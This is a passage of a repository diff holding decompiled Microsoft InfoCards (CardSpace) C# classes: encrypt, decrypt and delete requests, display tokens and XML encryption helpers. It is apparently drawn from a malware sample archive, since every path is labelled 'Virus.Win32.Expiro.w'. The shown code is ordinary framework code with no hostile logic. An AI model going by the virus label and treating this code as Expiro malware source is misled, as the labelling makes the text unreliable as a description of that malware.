if (this.m_isDisposed)
throw InfoCardTrace.ThrowHelperError((Exception) new ObjectDisposedException(nameof (DataSource)));
}
public static QueryParameter CreateDeleteStoreTypeQuery()
{
QueryParameter deleteStoreTypeQuery = new QueryParameter("ix_objecttype");
foreach (int num in Enum.GetValues(typeof (StorableObjectType)))
{
if (num != 0)
deleteStoreTypeQuery.AddMatch((object) num);
}
return deleteStoreTypeQuery;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DecryptRequest.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DecryptRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class DecryptRequest : ClientRequest
{
private int m_cryptoSession;
private bool m_useOAEP;
private byte[] m_encrypted;
private byte[] m_decrypted;
public DecryptRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
this.m_cryptoSession = 0;
this.m_useOAEP = false;
this.m_encrypted = (byte[]) null;
this.m_decrypted = (byte[]) null;
}
protected override void OnMarshalInArgs()
{
BinaryReader binaryReader = (BinaryReader) new InfoCardBinaryReader(this.InArgs);
this.m_cryptoSession = binaryReader.ReadInt32();
this.m_useOAEP = binaryReader.ReadBoolean();
int count = binaryReader.ReadInt32();
this.m_encrypted = binaryReader.ReadBytes(count);
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_cryptoSession, "cryptoSession");
InfoCardTrace.ThrowInvalidArgumentConditional(this.m_encrypted == null || 0 == this.m_encrypted.Length, "encrypted");
}
protected override void OnProcess() => this.m_decrypted = ((AsymmetricCryptoSession) CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User)).Decrypt(this.m_useOAEP, this.m_encrypted);
protected override void OnMarshalOutArgs()
{
try
{
Utility.SerializeBytes(new BinaryWriter(this.OutArgs), this.m_decrypted);
}
finally
{
Array.Clear((Array) this.m_decrypted, 0, this.m_decrypted.Length);
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DeleteCardRequest.cs
+91
View File
@@ -0,0 +1,91 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DeleteCardRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class DeleteCardRequest : UIAgentRequest
{
private Uri m_cardId;
public DeleteCardRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnInitializeAsSystem() => base.OnInitializeAsSystem();
protected override void OnMarshalInArgs() => this.m_cardId = Utility.DeserializeUri((BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode));
protected override void OnProcess()
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
connection.BeginTransaction();
try
{
DataRow singleRow = connection.GetSingleRow(QueryDetails.FullRow, new QueryParameter("ix_globalid", new object[1]
{
(object) GlobalId.DeriveFrom(this.m_cardId.ToString())
}));
if (singleRow != null)
{
byte[] dataField = singleRow.GetDataField();
try
{
using (MemoryStream memoryStream = new MemoryStream(dataField))
{
string name = new InfoCard((Stream) memoryStream).Name;
}
}
finally
{
connection.Delete(singleRow);
Array.Clear((Array) dataField, 0, dataField.Length);
}
}
ICollection collection = (ICollection) connection.Query(QueryDetails.Identifiers, new List<QueryParameter>()
{
new QueryParameter("ix_parentid", new object[1]
{
(object) GlobalId.DeriveFrom(this.m_cardId.ToString())
})
}.ToArray());
if (collection != null && collection.Count > 0)
{
foreach (DataRow row in (IEnumerable) collection)
connection.Delete(row);
}
connection.CommitTransaction();
AuditLog.AuditCardDeletion();
}
catch
{
connection.RollbackTransaction();
throw;
}
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DeleteStoreRequest.cs
+62
View File
@@ -0,0 +1,62 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DeleteStoreRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Collections;
using System.IO;
namespace Microsoft.InfoCards
{
internal class DeleteStoreRequest : UIAgentRequest
{
public DeleteStoreRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parentRequest)
: base(rpcHandle, inArgs, outArgs, parentRequest)
{
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
StoreConnection connection = StoreConnection.GetConnection();
try
{
connection.BeginTransaction();
try
{
QueryParameter deleteStoreTypeQuery = DataSource.CreateDeleteStoreTypeQuery();
ICollection collection = (ICollection) connection.Query(QueryDetails.Identifiers, connection.LocalDataSource, deleteStoreTypeQuery);
if (collection != null && collection.Count > 0)
{
foreach (DataRow row in (IEnumerable) collection)
connection.Delete(row);
}
connection.CommitTransaction();
AuditLog.AuditStoreDeletion();
}
catch
{
connection.RollbackTransaction();
throw;
}
}
finally
{
connection.Close();
}
}
protected override void OnMarshalOutArgs()
{
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DisplayClaim.cs
+57
View File
@@ -0,0 +1,57 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DisplayClaim
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.Collections.Generic;
using System.IO;
namespace Microsoft.InfoCards
{
internal class DisplayClaim
{
private string m_name;
private List<string> m_value;
private string m_description;
private string m_uri;
public string Name
{
get => this.m_name;
set => this.m_name = value;
}
public string Id => this.m_uri;
public DisplayClaim(BinaryReader reader) => this.Deserialize(reader);
public DisplayClaim(string name, List<string> value, string description, string uri)
{
this.m_name = name;
this.m_value = value;
this.m_description = description;
this.m_uri = uri;
}
public void Serialize(BinaryWriter writer)
{
Utility.SerializeString(writer, this.m_name);
writer.Write((uint) this.m_value.Count);
foreach (string str in this.m_value)
Utility.SerializeString(writer, str);
Utility.SerializeString(writer, this.m_description);
Utility.SerializeString(writer, this.m_uri);
}
public void Deserialize(BinaryReader reader)
{
this.m_name = Utility.DeserializeString(reader);
uint num = reader.ReadUInt32();
for (uint index = 0; index < num; ++index)
this.m_value.Add(Utility.DeserializeString(reader));
this.m_description = Utility.DeserializeString(reader);
this.m_uri = Utility.DeserializeString(reader);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DisplayClaimType.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DisplayClaimType
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal enum DisplayClaimType : byte
{
NoDisplayToken,
DisplayClaimString,
DisplayClaimList,
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/DisplayToken.cs
+85
View File
@@ -0,0 +1,85 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.DisplayToken
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.IO;
namespace Microsoft.InfoCards
{
internal class DisplayToken
{
private string m_displayString;
private string m_mimeType;
private List<DisplayClaim> m_displayList;
private DisplayClaimType m_displayType;
public IEnumerable<DisplayClaim> ClaimList => (IEnumerable<DisplayClaim>) this.m_displayList;
public DisplayToken() => this.m_displayType = DisplayClaimType.NoDisplayToken;
public DisplayToken(string displayString, string mimeType)
{
this.m_displayString = displayString;
this.m_mimeType = mimeType;
this.m_displayType = DisplayClaimType.DisplayClaimString;
}
public DisplayToken(List<DisplayClaim> claimList)
{
this.m_displayList = claimList;
this.m_displayType = DisplayClaimType.DisplayClaimList;
}
public void Serialize(BinaryWriter writer)
{
writer.Write((byte) this.m_displayType);
switch (this.m_displayType)
{
case DisplayClaimType.NoDisplayToken:
break;
case DisplayClaimType.DisplayClaimString:
Utility.SerializeString(writer, this.m_displayString);
Utility.SerializeString(writer, this.m_mimeType);
break;
case DisplayClaimType.DisplayClaimList:
writer.Write((uint) this.m_displayList.Count);
using (List<DisplayClaim>.Enumerator enumerator = this.m_displayList.GetEnumerator())
{
while (enumerator.MoveNext())
enumerator.Current.Serialize(writer);
break;
}
default:
InfoCardTrace.ThrowInvalidArgumentConditional(true, "ClaimType");
break;
}
}
public void Deserialize(BinaryReader reader)
{
this.m_displayType = (DisplayClaimType) reader.ReadByte();
switch (this.m_displayType)
{
case DisplayClaimType.NoDisplayToken:
break;
case DisplayClaimType.DisplayClaimString:
this.m_displayString = Utility.DeserializeString(reader);
this.m_mimeType = Utility.DeserializeString(reader);
break;
case DisplayClaimType.DisplayClaimList:
this.m_displayList.Clear();
uint num = reader.ReadUInt32();
for (uint index = 0; index < num; ++index)
this.m_displayList.Add(new DisplayClaim(reader));
break;
default:
throw InfoCardTrace.ThrowHelperError((Exception) new InvalidOperationException(SR.GetString("InvalidDisplayClaimType")));
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EncryptRequest.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EncryptRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class EncryptRequest : ClientRequest
{
private int m_cryptoSession;
private bool m_useOAEP;
private byte[] m_cleartext;
private byte[] m_encrypted;
public EncryptRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
this.m_cryptoSession = 0;
this.m_useOAEP = false;
this.m_cleartext = (byte[]) null;
this.m_encrypted = (byte[]) null;
}
protected override void OnMarshalInArgs()
{
BinaryReader binaryReader = (BinaryReader) new InfoCardBinaryReader(this.InArgs);
this.m_cryptoSession = binaryReader.ReadInt32();
this.m_useOAEP = binaryReader.ReadBoolean();
int count = binaryReader.ReadInt32();
this.m_cleartext = binaryReader.ReadBytes(count);
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_cryptoSession, "cryptoSession");
InfoCardTrace.ThrowInvalidArgumentConditional(this.m_cleartext == null || 0 == this.m_cleartext.Length, "clearText");
}
protected override void OnProcess()
{
try
{
this.m_encrypted = ((AsymmetricCryptoSession) CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User)).Encrypt(this.m_useOAEP, this.m_cleartext);
}
finally
{
Array.Clear((Array) this.m_cleartext, 0, this.m_cleartext.Length);
}
}
protected override void OnMarshalOutArgs() => Utility.SerializeBytes(new BinaryWriter(this.OutArgs), this.m_encrypted);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EncryptedData.cs
+130
View File
@@ -0,0 +1,130 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EncryptedData
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System.IdentityModel.Selectors;
using System.IdentityModel.Tokens;
using System.Security.Cryptography;
using System.Xml;
namespace Microsoft.InfoCards
{
internal class EncryptedData
{
private string m_type;
private EncryptedData.EncryptionMethodElement m_encryptionMethod;
private EncryptedData.CipherData m_cipherData;
private SecurityKeyIdentifier m_keyIdentifier;
private SecurityTokenSerializer m_tokenSerializer;
public EncryptedData()
{
this.m_cipherData = new EncryptedData.CipherData();
this.m_encryptionMethod = new EncryptedData.EncryptionMethodElement();
}
public string EncryptionMethod
{
set => this.m_encryptionMethod.algorithm = value;
}
public SecurityKeyIdentifier KeyIdentifier
{
set => this.m_keyIdentifier = value;
}
public string Type
{
set => this.m_type = value;
}
public SecurityTokenSerializer TokenSerializer
{
set => this.m_tokenSerializer = value;
}
public void SetUpEncryption(
SymmetricAlgorithm algorithm,
byte[] buffer,
int offset,
int length)
{
InfoCardTrace.ThrowInvalidArgumentConditional(null == algorithm, nameof (algorithm));
byte[] iv;
byte[] cipherText;
this.GenerateIVAndEncrypt(algorithm, buffer, offset, length, out iv, out cipherText);
this.m_cipherData.SetCipherValueFragments(iv, cipherText);
}
public void WriteTo(XmlWriter writer)
{
writer.WriteStartElement("enc", nameof (EncryptedData), "http://www.w3.org/2001/04/xmlenc#");
if (!string.IsNullOrEmpty(this.m_type))
writer.WriteAttributeString("Type", (string) null, this.m_type);
if (!string.IsNullOrEmpty(this.m_encryptionMethod.algorithm))
this.m_encryptionMethod.WriteTo(writer);
if (this.m_keyIdentifier != null)
this.m_tokenSerializer.WriteKeyIdentifier((XmlWriter) XmlDictionaryWriter.CreateDictionaryWriter(writer), this.m_keyIdentifier);
this.m_cipherData.WriteTo(writer);
writer.WriteEndElement();
}
private void GenerateIVAndEncrypt(
SymmetricAlgorithm algorithm,
byte[] plainText,
int offset,
int length,
out byte[] iv,
out byte[] cipherText)
{
RandomNumberGenerator randomNumberGenerator = (RandomNumberGenerator) new RNGCryptoServiceProvider();
int length1 = algorithm.BlockSize / 8;
iv = new byte[length1];
randomNumberGenerator.GetBytes(iv);
algorithm.Padding = PaddingMode.PKCS7;
algorithm.Mode = CipherMode.CBC;
using (ICryptoTransform encryptor = algorithm.CreateEncryptor(algorithm.Key, iv))
cipherText = encryptor.TransformFinalBlock(plainText, offset, length);
}
private struct CipherData
{
private byte[] m_iv;
private byte[] m_cipherText;
public byte[] CipherValue => this.m_cipherText;
public void SetCipherValueFragments(byte[] iv, byte[] cipherText)
{
this.m_iv = iv;
this.m_cipherText = cipherText;
}
public void WriteTo(XmlWriter writer)
{
writer.WriteStartElement("enc", nameof (CipherData), "http://www.w3.org/2001/04/xmlenc#");
writer.WriteStartElement("enc", "CipherValue", "http://www.w3.org/2001/04/xmlenc#");
if (this.m_iv != null)
writer.WriteBase64(this.m_iv, 0, this.m_iv.Length);
writer.WriteBase64(this.m_cipherText, 0, this.m_cipherText.Length);
writer.WriteEndElement();
writer.WriteEndElement();
}
}
private struct EncryptionMethodElement
{
internal string algorithm;
public void WriteTo(XmlWriter writer)
{
writer.WriteStartElement("enc", "EncryptionMethod", "http://www.w3.org/2001/04/xmlenc#");
writer.WriteAttributeString("Algorithm", (string) null, this.algorithm);
writer.WriteEndElement();
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EncryptedFileStoreHeader.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EncryptedFileStoreHeader
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.Runtime.InteropServices;
namespace Microsoft.InfoCards
{
[StructLayout(LayoutKind.Explicit, Size = 608)]
internal struct EncryptedFileStoreHeader
{
public const int StructSize = 608;
public const int VersionOffset = 0;
public const int SizeOffset = 4;
public const int KeyBlockOffset = 8;
public const int IndexOffset = 600;
public const int DataSizeOffset = 604;
[MarshalAs(UnmanagedType.U4)]
[FieldOffset(0)]
public uint Version;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(4)]
public int Size;
[MarshalAs(UnmanagedType.Struct)]
[FieldOffset(8)]
public KeyBlock KeyBlock;
[MarshalAs(UnmanagedType.Struct)]
[FieldOffset(8)]
public KeyBlockV2 KeyBlockV2;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(600)]
public int IndexSize;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(604)]
public int DataSize;
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EncryptedObjectHeader.cs
+45
View File
@@ -0,0 +1,45 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EncryptedObjectHeader
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.Runtime.InteropServices;
namespace Microsoft.InfoCards
{
[StructLayout(LayoutKind.Explicit, Size = 72)]
internal struct EncryptedObjectHeader
{
public const int StructSize = 72;
public const int IVBlockSize = 32;
public const int IVOffset = 0;
public const int GlobalIdOffset = 32;
public const int LastChangeOffset = 48;
public const int DataSizeOffset = 56;
public const int ObjectTypeOffset = 60;
public const int LocalIdOffset = 64;
public const int TailPaddingOffset = 68;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 32)]
[FieldOffset(0)]
public byte IV;
[MarshalAs(UnmanagedType.Struct)]
[FieldOffset(32)]
public GlobalId GlobalId;
[MarshalAs(UnmanagedType.I8)]
[FieldOffset(48)]
public long LastChange;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(56)]
public int DataSize;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(60)]
public int ObjectType;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(64)]
public int LocalId;
[MarshalAs(UnmanagedType.I4)]
[FieldOffset(68)]
private int TailPadding;
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EncryptionUtility.cs
+116
View File
@@ -0,0 +1,116 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EncryptionUtility
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IdentityModel.Selectors;
using System.IdentityModel.Tokens;
using System.IO;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.ServiceModel.Security;
using System.ServiceModel.Security.Tokens;
using System.Xml;
namespace Microsoft.InfoCards
{
internal sealed class EncryptionUtility
{
private EncryptionUtility()
{
}
public static XmlElement EncryptSecurityToken(
SecurityToken tokenToBeEncrypted,
X509Certificate2 cert,
string encryptingAlgorithm,
string asymmetricKeyWrapAlgorithm,
ProtocolProfile profile)
{
MemoryStream streamToBeEncrypted = new MemoryStream();
XmlDictionaryWriter dictionaryWriter = XmlDictionaryWriter.CreateDictionaryWriter((XmlWriter) new XmlTextWriter((TextWriter) new StreamWriter((Stream) streamToBeEncrypted)));
profile.TokenSerializer.WriteToken((XmlWriter) dictionaryWriter, tokenToBeEncrypted);
dictionaryWriter.Flush();
streamToBeEncrypted.Seek(0L, SeekOrigin.Begin);
return EncryptionUtility.EncryptToken(streamToBeEncrypted, cert, encryptingAlgorithm, asymmetricKeyWrapAlgorithm, profile);
}
public static XmlElement EncryptSecurityToken(
XmlElement elem,
X509Certificate2 cert,
string encryptingAlgorithm,
string asymmetricKeyWrapAlgorithm,
ProtocolProfile profile)
{
MemoryStream streamToBeEncrypted = new MemoryStream();
XmlDictionaryWriter dictionaryWriter = XmlDictionaryWriter.CreateDictionaryWriter((XmlWriter) new XmlTextWriter((TextWriter) new StreamWriter((Stream) streamToBeEncrypted)));
elem.WriteTo((XmlWriter) dictionaryWriter);
dictionaryWriter.Flush();
streamToBeEncrypted.Seek(0L, SeekOrigin.Begin);
return EncryptionUtility.EncryptToken(streamToBeEncrypted, cert, encryptingAlgorithm, asymmetricKeyWrapAlgorithm, profile);
}
private static XmlElement EncryptToken(
MemoryStream streamToBeEncrypted,
X509Certificate2 cert,
string encryptingAlgorithm,
string asymmetricKeyWrapAlgorithm,
ProtocolProfile profile)
{
InfoCardTrace.ThrowInvalidArgumentConditional(string.IsNullOrEmpty(encryptingAlgorithm), nameof (encryptingAlgorithm));
InfoCardTrace.ThrowInvalidArgumentConditional(null == cert, nameof (cert));
SecurityToken wrappingToken = (SecurityToken) new X509SecurityToken(cert, "id");
SecurityAlgorithmSuite securityAlgorithmSuite1 = SecurityAlgorithmSuite.Default;
SecurityAlgorithmSuite securityAlgorithmSuite2;
switch (encryptingAlgorithm)
{
case "http://www.w3.org/2001/04/xmlenc#aes128-cbc":
securityAlgorithmSuite2 = SecurityAlgorithmSuite.Basic128;
break;
case "http://www.w3.org/2001/04/xmlenc#aes192-cbc":
securityAlgorithmSuite2 = SecurityAlgorithmSuite.Basic192;
break;
case "http://www.w3.org/2001/04/xmlenc#aes256-cbc":
securityAlgorithmSuite2 = SecurityAlgorithmSuite.Basic256;
break;
case "http://www.w3.org/2001/04/xmlenc#tripledes-cbc":
securityAlgorithmSuite2 = SecurityAlgorithmSuite.TripleDes;
break;
default:
throw InfoCardTrace.ThrowHelperError((Exception) new TokenCreationException(SR.GetString("UnsupportedEncryptionAlgorithm", (object) encryptingAlgorithm)));
}
SecurityKeyIdentifier wrappingTokenReference = new SecurityKeyIdentifier(new SecurityKeyIdentifierClause[1]
{
(SecurityKeyIdentifierClause) wrappingToken.CreateKeyIdentifierClause<X509ThumbprintKeyIdentifierClause>()
});
byte[] numArray = new byte[securityAlgorithmSuite2.DefaultEncryptionKeyDerivationLength / 8];
new RNGCryptoServiceProvider().GetNonZeroBytes(numArray);
WrappedKeySecurityToken keySecurityToken = new WrappedKeySecurityToken(string.Empty, numArray, asymmetricKeyWrapAlgorithm, wrappingToken, wrappingTokenReference);
SecurityKeyIdentifier securityKeyIdentifier = new SecurityKeyIdentifier(new SecurityKeyIdentifierClause[1]
{
(SecurityKeyIdentifierClause) new EncryptedKeyIdentifierClause(keySecurityToken.GetWrappedKey(), keySecurityToken.WrappingAlgorithm, keySecurityToken.WrappingTokenReference)
});
SymmetricAlgorithm symmetricAlgorithm = ((SymmetricSecurityKey) keySecurityToken.SecurityKeys[0]).GetSymmetricAlgorithm(encryptingAlgorithm);
EncryptedData encryptedData = new EncryptedData();
encryptedData.TokenSerializer = (SecurityTokenSerializer) profile.TokenSerializer;
encryptedData.KeyIdentifier = securityKeyIdentifier;
encryptedData.EncryptionMethod = encryptingAlgorithm;
encryptedData.Type = "http://www.w3.org/2001/04/xmlenc#Element";
encryptedData.SetUpEncryption(symmetricAlgorithm, streamToBeEncrypted.GetBuffer(), 0, Convert.ToInt32(streamToBeEncrypted.Length));
MemoryStream input = new MemoryStream();
XmlDictionaryWriter dictionaryWriter = XmlDictionaryWriter.CreateDictionaryWriter((XmlWriter) new XmlTextWriter((TextWriter) new StreamWriter((Stream) input)));
encryptedData.WriteTo((XmlWriter) dictionaryWriter);
dictionaryWriter.Flush();
input.Seek(0L, SeekOrigin.Begin);
XmlElement xmlElement = (XmlElement) new XmlDocument().ReadNode((XmlReader) Utility.CreateReaderWithQuotas((Stream) input));
Array.Clear((Array) streamToBeEncrypted.GetBuffer(), 0, Convert.ToInt32(streamToBeEncrypted.Length));
Array.Clear((Array) input.GetBuffer(), 0, Convert.ToInt32(input.Length));
streamToBeEncrypted.Close();
input.Close();
return xmlElement;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EndCreateSecurityTokenRequest.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EndCreateSecurityTokenRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class EndCreateSecurityTokenRequest : UIAgentAsyncEndRequest
{
public EndCreateSecurityTokenRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalAsyncOutArgs(BinaryWriter writer) => ((GetTokenRequest) this.ParentRequest).Token.DisplayToken.Serialize(writer);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/EndGetFileNameFromUserRequest.cs
+33
View File
@@ -0,0 +1,33 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.EndGetFileNameFromUserRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
namespace Microsoft.InfoCards
{
internal class EndGetFileNameFromUserRequest : UIAgentAsyncEndRequest
{
public EndGetFileNameFromUserRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
